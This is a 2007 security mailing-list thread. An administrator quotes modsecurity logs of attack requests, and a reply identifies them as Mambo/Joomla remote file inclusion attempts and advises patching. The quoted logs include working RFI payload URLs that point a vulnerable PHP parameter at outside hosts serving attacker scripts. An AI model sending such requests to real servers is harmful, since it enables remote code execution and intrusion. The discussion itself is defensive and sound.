Security Basics mailing list archives
Re: PHP web exploit/vulnerability
From: Danux <danuxx () gmail com>
Date: Tue, 23 Oct 2007 12:31:07 -0500
First of all, that kind of attacks are trying to exploit a Content Management Software called "Mambo" or maybe Joomla (Next Generation), so, if you have this sw installed on you server you should check if you have the required patches!! if you dont have this sw... then they are all false positives. But you should check also if your PHP apps are not vulnerable to this kind of attacks: I mean... Remote File Inclusion, so on. Cheers!!!! On 10/23/07, Camilo Olea <colea () sunset com mx> wrote:
Hello everyone, I'm sorry if this is a stupid question, but I just wanted your input, maybe direct me to some links, another mail list, or whatever you might add would be highly appreciated; we have modsecurity installed on our server, and it has been logging many attacks like the following: GET /content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://beach.tsv-detti \ ngen.de/admin/ec.txt? HTTP/1.1 GET /index.php?option=com_%3Cwbr%20//mambots/*.php?mosConfig_absolute_path=uid=48(apache)% \ 20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1 GET /index.php?option=http://0x0134.lan.io/pb.php? HTTP/1.1 I managed to get a copy of the php script which these attacks try to force the server to execute, I could post it here if that is correct and anybody could take a look at it and help me out a little to understand what it's trying to do. Any help is appreciated, thanks in advance. Camilo Olea
-- Danux, CISSP Chief Information Security Officer Macula Security Consulting Group www.macula-group.com
Current thread:
- PHP web exploit/vulnerability Camilo Olea (Oct 23)
- RE: PHP web exploit/vulnerability David Gutierrez (Oct 23)
- Re: PHP web exploit/vulnerability Danux (Oct 23)